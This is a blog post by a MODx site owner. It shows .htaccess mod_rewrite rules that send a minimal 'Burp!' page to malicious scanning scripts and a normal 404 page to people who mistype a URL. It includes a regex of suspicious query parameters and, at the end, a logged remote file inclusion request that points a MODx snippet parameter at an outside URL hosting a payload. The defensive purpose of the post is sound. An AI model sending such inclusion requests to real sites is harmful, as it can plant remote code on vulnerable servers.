From the moment I moved my site to a MODx platform, I began to observe an increase in the number of various scripts targeting it. I run my site on a self-configured and self-maintained server, which allows me to study every such script in detail.
The overwhelming majority of requests sent by malicious scripts simply result in sending out error documents, however, sometimes the scripts cause parse errors, which prompts me to study the source code and patch its weak spots. For the past two months, I have been highly satisfied with the server’s ability to distinguish between error requests by human users and malicious scripts.
I have two error documents set up for my MODx site:
404-object-not-found <- it is a full-fledged xhtml/css/graphics-decorated page sent when human misspells the url in address bar
404-burp <- it is a document based on „blank” template, its content comprises single word „Burp!” and these five bytes are sent in response to malicious scripts (instead of, for example, 50-70 KB of full-featured xhtml/css that for sure will not be appreciated in any way by non-human caller).
Now for the most important part: each request should be analyzed and distinguished by the server. Almost every well-designed MODx site takes advantage of the „mod_rewrite” module and this is a great opportunity for such an analysis.
After activating the rewriting feature, you can include the following in the .htaccess file:
# handle invalid requests (human part)
ErrorDocument 403 http://sitedomain/404-object-not-found
ErrorDocument 404 http://sitedomain/404-object-not-found
# burp in response to malicious scripts
RewriteCond %{QUERY_STRING} (base(dir)?|(classes|lib)_dir|error|inhalt|page|path)=|root_dir|request|session|http:// [NC]
RewriteRule ^(.*)$ 404-burp? [R,L]
The RewriteCond rule is the result of my observations of site access statistics and error and request logs. Malicious scripts attempt to accomplish their goals by sending weird query strings — these strings are intercepted by the server and the entire request is handled by four characters and an exclamation mark.
We have no influence over who attempts to access our page (or what their intent is), but we can decide what the response will be. Example responses:
Human’s mistake:
http://setpro.net.pl/misspelled
"Classical" sniffing the MODx site -- request sent from within Perl script:
http://setpro.net.pl/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://sites.google.com/site/bsdcr3w/Home/prc.gif??